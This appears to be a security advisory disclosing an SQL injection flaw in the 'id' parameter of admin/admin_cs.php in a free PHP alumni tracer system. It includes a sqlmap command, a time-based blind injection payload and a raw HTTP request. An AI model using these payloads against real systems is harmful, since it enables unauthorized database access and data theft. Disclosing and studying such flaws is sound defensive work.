Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code V1.0 admin/admin_cs.php - SQL injection vulnerability V1.0 admin/admin_cs.php - SQL injection vulnerability

[xuanluansec]

Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code V1.0 admin/admin_cs.php - SQL injection vulnerability V1.0 admin/admin_cs.php - SQL injection vulnerability

• Author: zhang guixiang

Vendor Homepage

• https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html

Software Link

• https://www.sourcecodester.com/sites/default/files/download/oretnom23/tracking.zip

Overview

• zhang guixiang has discovered that Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code is affected by serious security vulnerabilities due to insufficient protection of the "id" parameter in the "admin/admin_cs.php" file. This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.

Vulnerability Details

• Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code V1.0 admin/admin_cs.php - SQL injection vulnerability V1.0
• Vulnerable File: admin/admin_cs.php
• Parameter Names: id
• Attack Type: Remote

Description

• zhang guixiang has discovered that Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code is affected by serious security vulnerabilities due to insufficient protection of the "id" parameter in the "admin/admin_cs.php" file. This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.

Proof of Concept (PoC) :

• sqlmap -u "www.tracking.com:8098/admin/admin_cs.php?id=1" -p id --dbms=mysql -v 3

---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 2975 FROM (SELECT(SLEEP(5)))ansi) AND 'Pxda'='Pxda
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---

Burp Suite (POC):

GET /admin/admin_cs.php?id=id=1' AND (SELECT 2975 FROM (SELECT(SLEEP(10)))ansi) AND 'Pxda'='Pxda HTTP/1.1
Host: www.tracking.com:8098
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1